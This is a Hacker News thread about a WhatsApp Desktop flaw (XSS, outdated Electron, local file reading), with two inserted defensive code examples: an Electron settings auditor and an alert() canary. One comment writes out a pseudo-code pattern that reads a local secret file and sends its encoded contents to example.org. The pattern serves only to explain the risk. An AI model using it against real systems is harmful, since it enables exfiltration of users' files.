[HN Gopher] I found a WhatsApp security flaw that allowed hacker...
       ___________________________________________________________________
        
       I found a WhatsApp security flaw that allowed hackers to read the
       file system
        
       Author : ccmpx
       Score  : 254 points
       Date   : 2020-02-04 16:35 UTC (6 hours ago)
        
 (HTM) web link (www.perimeterx.com)
 (TXT) w3m dump (www.perimeterx.com)
        
       | kjaftaedi wrote:
       | Very nice work! Also curious what kind of bounty was paid out for
       | this.
        
         | Deimorz wrote:
         | The article originally said that he received a $12,500 bounty
         | for it, but it looks like that's been removed now (maybe you're
         | not supposed to say).
         | 
         | You can still see it at both the top and bottom of this
         | archived copy:
         | https://web.archive.org/web/20200204164053/http://www.perime...
        
         | luckydata wrote:
         | half of Jeff Bezos' net worth.
        
       | oarsinsync wrote:
       | > If you're going to use Electron, you HAVE to make sure it is
       | updated with each update of Chromium.
       | 
       | I never really thought about this, but in retrospect, this is so
       | blindingly obvious, and is almost certainly a potential exploit
       | vector to a wide range of electron-based apps.
        
         | lima wrote:
         | It sure is. This is why Chrome apps and progressive web apps
         | are great - they share the Chrome runtime and inherit its
         | hardening, security properties and updates.
         | 
         | Many Electron apps should just be a PWA instead, and many
         | actually are. Why would I want to install a desktop app for
         | WhatsApp? It runs just fine in Chrome, and using More Tools ->
         | Create shortcut..., you can even create a launcher entry that
         | will launch the page in its own window.
        
           | randall wrote:
           | This needs to be distributable by the website... also with
           | caching guarantees, desktop capture support (which I think is
           | there now, but wasn't till just recently) etc.
        
           | vbezhenar wrote:
            | How do I build an installer for a Chrome PWA? Like if the user
            | does not have Chrome, it should install it. Also I don't want to
            | bother the user with that implicitly installed Chrome, so it
            | should not add shortcuts, etc., and just live as an app
            | launcher.
        
             | shawnz wrote:
             | Don't bundle Chrome, just let the user use whatever browser
             | they prefer. AFAIK Edge also supports PWAs, but not Firefox
             | Desktop yet.
        
             | onei wrote:
             | Turns out a PWA works in Firefox too [1] so I'm not sure
             | it's entirely necessary to force a user to install a
             | browser just for your app. Edge is/will be chromium, so I
             | guess Safari is the only major browser to worry about?
             | 
             | [1] https://blog.mozilla.org/firefox/progressive-web-apps-
             | whats-...
        
             | m-p-3 wrote:
             | IMO you shouldn't have to make an installer, it should be
             | the browser's job to expose the feature and integrate
             | itself to the OS as natively as possible.
        
           | bitL wrote:
            | Because of the inability of PWAs to write local files at desired
            | locations (you can at best download a file), PWAs' usefulness
            | is limited as a desktop app replacement technology. The
            | moment you allow rw local file access you are off to a
            | security-fun-land.
        
             | sayhello wrote:
             | I beg to disagree :-)
             | 
             | I've worked on the Native File System API on Chrome.
             | 
             | It's available through Origin Trial at the moment.
             | 
             | That said, Web apps can currently emulate reading files and
             | writing to disk.
             | 
              | Take a look at this library, which also works as a
              | polyfill:
             | 
             | https://github.com/tomayac/browser-nativefs
        
               | bitL wrote:
               | IIRC there was a feud between Chrome developers who
               | wanted raw file access and Firefox ones who didn't want
               | it. W3C sided with FF, so we can't build proper desktop
               | apps using PWA, even if WASM makes them quite fast these
               | days. Now Chrome devs resuscitated the attempt with NFS
               | API, so I'll grab my popcorn and watch their interaction
               | one more time...
        
             | lima wrote:
             | Right, but this is a small minority of applications.
        
               | tonyarkles wrote:
               | I strongly strongly disagree!
               | 
               | The vast majority of the work I do can be done off-line
               | with files stored on disk, minus stuff that obviously
               | needs connectivity (e.g. Slack). Writing text, writing
               | code, reading/editing documents and spreadsheets, doing
               | CAD (mechanical and electronics), etc. During the week I
               | live in the city, but on weekends and occasionally for
               | longer stretches of time I like to head out to our rural
               | house for peace and quiet (and focused work). Over time,
                | the number of applications that _ought_ to work off-line
                | has been slowly shrinking, whether it's because they
               | insist on using cloud storage instead of local storage,
               | or licensing checks, or whatever. It's really really
               | disappointing, and I would personally be delighted if I
               | could get work done without an Internet connection.
        
               | shawnz wrote:
               | You can design a PWA that works offline with local files
               | on disk already, by using the browser's file select
               | dialogs. It's not necessary to give the app arbitrary
               | access to the whole filesystem to get that functionality,
               | which is what the parent is asking for.
        
               | tonyarkles wrote:
               | I'm genuinely not all that familiar with what PWAs can
               | and can't do... Would a, for example, Word-like PWA be
               | able to both load and save files to disk?
        
         | tptacek wrote:
         | The big problem with Electron isn't that it forces you to keep
         | up with Chrome, although that's important too, but rather that
         | it links Node.js with content-controlled Javascript, so that
         | DOM corruption vulnerabilities can be leveraged for RCE, even
         | in the absence of a Chrome vulnerability. Most Electron RCEs
         | that you've read about had nothing to do with Chromium.
         | 
         | There's a whole process for evaluating and auditing Electron
         | applications, which is harder to do than auditing (for
         | instance) a native mobile application or, probably, even a
         | native desktop application.
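
The mitigation implied by this comment is to keep Node.js out of reach of content-controlled JavaScript in the renderer. As an added example (not from the article, the thread, or the Electron project), a small audit helper that checks a BrowserWindow `webPreferences` object for settings that bridge page script to Node.js; the option names are real Electron keys, while the two sample configurations and the defaults table are constructed here.

```javascript
// Added example (not from the article or this thread): audit an Electron
// BrowserWindow `webPreferences` object for settings that let content-
// controlled JavaScript reach Node.js. Keys are real Electron options; the
// sample configurations and the defaults table are constructed here.

// Each rule: [option, value that is unsafe, why it matters].
const RULES = [
  ["nodeIntegration", true,
   "page scripts can call require(), so any XSS runs code in the app process"],
  ["contextIsolation", false,
   "page and preload share one JS world, so page code can tamper with preload"],
  ["sandbox", false,
   "renderer is not OS-sandboxed, so a Chromium bug lands on the host directly"],
  ["webSecurity", false,
   "same-origin policy is off, so remote content can read local resources"],
  ["allowRunningInsecureContent", true,
   "HTTPS pages may load HTTP scripts that a network attacker can swap"],
  ["enableRemoteModule", true,
   "the remote module hands the renderer proxies to main-process objects"],
];

// Defaults as they stood in older Electron releases (nodeIntegration on,
// contextIsolation off): an omitted key is NOT a safe key.
const LEGACY_DEFAULTS = {
  nodeIntegration: true, contextIsolation: false, sandbox: false,
  webSecurity: true, allowRunningInsecureContent: false, enableRemoteModule: true,
};

// One finding per rule whose effective (explicit or default) value is unsafe.
function auditWebPreferences(prefs, defaults = LEGACY_DEFAULTS) {
  const effective = { ...defaults, ...prefs };
  return RULES
    .filter(([key, unsafe]) => effective[key] === unsafe)
    .map(([key, unsafe, why]) => ({ key, value: unsafe, why }));
}

// Constructed weak window: relies on legacy defaults while rendering remote HTML.
const weakPrefs = { preload: "preload.js" };
// Constructed hardened window: content JS cannot reach Node.js; whatever the
// page legitimately needs is exposed by the preload over IPC instead.
const hardenedPrefs = {
  nodeIntegration: false, contextIsolation: true, sandbox: true,
  webSecurity: true, allowRunningInsecureContent: false, enableRemoteModule: false,
  preload: "preload.js",
};

for (const f of auditWebPreferences(weakPrefs)) {
  console.log(`weak config: ${f.key}=${f.value} -> ${f.why}`);
}
console.log(`hardened config findings: ${auditWebPreferences(hardenedPrefs).length}`);
```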
        
           | Invictus0 wrote:
           | Can you imagine reading this comment 100 years ago?
        
             | ASalazarMX wrote:
             | They would be amazed, as this sounds like incredibly
             | advanced technology, and maybe disappointed when they find
             | it was all about imaginary objects in an interactive
             | projector.
             | 
             | John Titor would be proud.
        
           | stingraycharles wrote:
            | Why would they need a node process? Are there things an
            | Electron app needs to do that aren't possible from the Chrome
            | runtime? And more importantly, why would they need to
            | directly link with the DOM?
           | 
           | Sorry I am not very familiar with Electron.
        
             | tptacek wrote:
             | Since bridging Node.js with the DOM is basically the whole
             | point of Electron, it's a little tough for me to answer
             | this question. Yes, there are things Electron apps need to
             | do that you can't do from standard Chrome.
        
         | bhaavan wrote:
         | I think it is a good idea to containerize all electron apps,
         | and run them only in containers. It is because reducing the
         | surface area of your code to the system will reduce
         | vulnerabilities of your code.
        
       | imvetri wrote:
       | TLDR: 1. Altering the text of someone else's reply. 2. Altering
       | banner image of someone else's reply containing links. 3,4,5.
       | Good.
        
       | Dinux wrote:
        | I'm a heavy WhatsApp user and I feel like WhatsApp has gone
        | downhill ever since Facebook took over. Performance is down
        | significantly, I experience a lot more visible bugs, more and
        | more exploits are being revealed about seemingly trivial
        | components (file encryption, browser XSS), and useless features
        | are being added. It's not like WhatsApp Inc. was flawless before
        | they got acquired, but at least it worked well and most of the
        | developers _actually_ wanted to make a great chat app.
        | 
        | It's just a matter of time before Facebook merges WhatsApp with
        | its Messenger (and keeps either of those names).
        
         | Stubb wrote:
         | Signal and Telegram are both solid alternatives built around
         | different security models. When I get a notification in
         | Messenger, Instagram, etc., I simply reply back with my contact
         | info for those apps. Telegram gives you a vanity URL using your
         | username, which is pretty cool.
        
           | Dinux wrote:
           | Yes I am using Signal. It's just that most people around me
           | are not on Signal. Trying to convince them to switch is
           | useless (although I try). WhatsApp is not my first choice
           | either.
        
             | _jal wrote:
             | Tell them no.
             | 
             | My perspective is, pick one of the many overlapping
             | channels we already share or don't bother me. I am not
             | signing up to yet another spyware-of-the-month app in order
             | to chase your fashion sense.
        
               | roel_v wrote:
                | WhatsApp has been the default choice for 10 years. From
                | other people's pov, Signal and Telegram are the 'fashion'
                | apps.
        
               | kelnos wrote:
               | It's a trade off. In some cases not installing the
               | messaging app du jour means being left out of group
               | chats. If that's ok with you, then by all means, allow
               | yourself to be excluded. But that's not ok with everyone.
        
               | meowface wrote:
               | They would say the same of you, from their perspective.
               | It's like someone asking you for your Twitter and you
               | replying that you only use Mastodon.
        
             | petre wrote:
             | I plainly tell them to e-mail me or contact me via Wire or
             | Signal.
             | 
             | Maybe this whole Bezos affair would convince them it's
             | insecure spyware from yours truly Facebook and their
             | friends in the UAE? I think not.
        
           | roywiggins wrote:
           | The Signal desktop app is also Electron, isn't it?
        
             | joecool1029 wrote:
              | Correct, as of a few years ago. Previously, it used to be a
              | Chrome app (I think NaCl crap?)
        
           | roel_v wrote:
           | People often say this, but I wonder if they've actually used
           | those apps. For example Signal, try to back up your chat
           | history. The hoops you have to jump through are not feasible
           | for non-technical users. There were many more relatively
           | small issues like this (I tried switching 6 months ago) but I
           | forgot most.
           | 
            | For a basic 'send text message from user A to user B' app,
            | there are lots of options. Something that is as convenient as
            | WhatsApp though - there are none.
        
             | Shoetp wrote:
             | I've been using Telegram for something like 5 years now.
             | I'm curious, what's the problem with it?
        
       | akerro wrote:
        | How come WhatsApp has so many security flaws recently and
        | Signal isn't affected? This cannot be a coincidence, right? Signal
        | has fewer people working on it, no massive corporation behind the
        | product, more people as smart as Moxie working on it. I don't
        | believe these flaws are just bugs... Right?
        
         | kelnos wrote:
         | Signal has a team of people behind it whose main focus is
         | security and privacy. Of course everyone makes security
         | mistakes, but I'd expect the Signal team to make fewer of them.
         | 
         | In this case, I would say the fewer people working on Signal is
         | a strength, not a weakness.
        
         | bhaavan wrote:
         | What is the basis of the assertion that "Signal isn't
         | affected"? Do you track CVEs for Signal?
        
       | wiredfool wrote:
       | Wonder what other electron apps have issues like this, or at
       | least did until they quickly updated their electron version.
        
       | Priem19 wrote:
       | Well of course you did, it's WhatsApp. That's like saying "I
       | found a health concern with smoking cigarettes."
        
       | vmchale wrote:
        | Sounds like the WhatsApp developers are gunning to be acquihired
        | by the DNC.
        
       | kome wrote:
        | I'm starting to think that Durov was right after all...
        
       | mrnobody_67 wrote:
        | This is probably how the Saudis got the data off Jeff's phone...
        
         | boring_twenties wrote:
         | You think Bezos was running the desktop/Electron app on his
         | phone?
        
           | Dinux wrote:
           | He could have used the OSX desktop app. But the Bezos thing
           | seems to be unrelated (as far as I can tell).
        
       | h1fra wrote:
        | Wow, testing for `alert()` in a JavaScript environment is like
        | the first thing you learn. Feels bad for WhatsApp engineers :/
        
         | dancemethis1 wrote:
         | They are busy tampering with OpenWhisper.
        
         | robocat wrote:
          | Someone should create a nice little canary.js that reports on
          | alert() etc. being called by setting window.alert = function
          | honeypotFunction(){...};. Although perhaps the noise from
          | extensions and users would make the signal too useless.
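
One way to build the canary this comment sketches, as an added example that is not from the thread: the dialog functions are wrapped so that a call in an app which never legitimately opens them is reported with a stack trace and swallowed rather than shown. The `report` sink and the stand-in window object are constructed for illustration.

```javascript
// Added example (not from the thread): a canary that wraps window.alert and
// its siblings so that, in an app which never legitimately opens them, any
// call is reported with a stack trace instead of shown. The `report` sink and
// the stand-in window object are constructed for illustration.

const WATCHED = ["alert", "confirm", "prompt"];
// Value each wrapper returns, matching what a dismissed/cancelled dialog yields.
const CANCELLED = { alert: undefined, confirm: false, prompt: null };

// Wrap the dialog functions on `win`; returns a function that restores them.
function installDialogCanary(win, report) {
  const originals = {};
  for (const name of WATCHED) {
    originals[name] = win[name];
    win[name] = function canary(...args) {
      // Drop the "Error" header and this frame; what remains is the caller,
      // which in a real page points at the script that made the call.
      const stack = new Error().stack.split("\n").slice(2).join("\n");
      report({ fn: name, args: args.map(String), stack, at: Date.now() });
      return CANCELLED[name]; // never open the real dialog
    };
  }
  return () => { for (const name of WATCHED) win[name] = originals[name]; };
}

// In-memory sink. A deployment would POST batches to a logging endpoint and
// rate-limit per origin, since extensions and users also trigger dialogs.
function makeMemoryReporter() {
  const events = [];
  return { report: (e) => events.push(e), events };
}

// Constructed stand-in for the browser window; the real alert must not fire.
const fakeWindow = {
  alert: () => { throw new Error("real alert() should never be reached"); },
  confirm: () => true,
  prompt: () => "typed by user",
};

const sink = makeMemoryReporter();
const restore = installDialogCanary(fakeWindow, sink.report);
fakeWindow.alert("xss probe");                 // reported, not shown
const confirmed = fakeWindow.confirm("Sure?");  // reported, returns false
restore();                                      // originals back in place
```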
        
       | dmurray wrote:
       | He didn't really demonstrate how "hackers" could read the file
       | system, right? The screenshot of etc/hosts is on the same
       | computer where that hosts file lives.
       | 
       | > There are more than 5 different 1-day RCEs in Chromium 69 or
       | higher, you just need to find a published one and use it through
       | the persistent XSS found earlier and BAM: Remote Code Execution
       | ACHIEVED!
       | 
       | > I did not take the time to actually exploit a public RCE
       | 
       | The XSS vulnerability is serious and looks fully deserving of a
       | bug bounty. Likewise, using an old version of Electron is asking
       | for trouble. But for me this PoC should include the extra step of
       | "just" exploiting one of the RCE holes he's sure must exist.
        
         | JoshTriplett wrote:
         | > He didn't really demonstrate how "hackers" could read the
         | file system, right? The screenshot of etc/hosts is on the same
         | computer where that hosts file lives.
         | 
          | If you can fetch arbitrary URLs, and the contents of local
          | files, you can trivially exfiltrate the latter with the former.
          | Just fetch the local file, then fetch a URL that encodes the
          | contents of the local file.
          | 
          |     var text = fetch("/local/secret/file");
          |     fetch("https://example.org/"+encode(text));
        
         | nebulous1 wrote:
         | > He didn't really demonstrate how "hackers" could read the
         | file system, right? The screenshot of etc/hosts is on the same
         | computer where that hosts file lives.
         | 
         | Are you saying he could alert it but not exfiltrate it?
        
       ___________________________________________________________________
       (page generated 2020-02-04 23:00 UTC)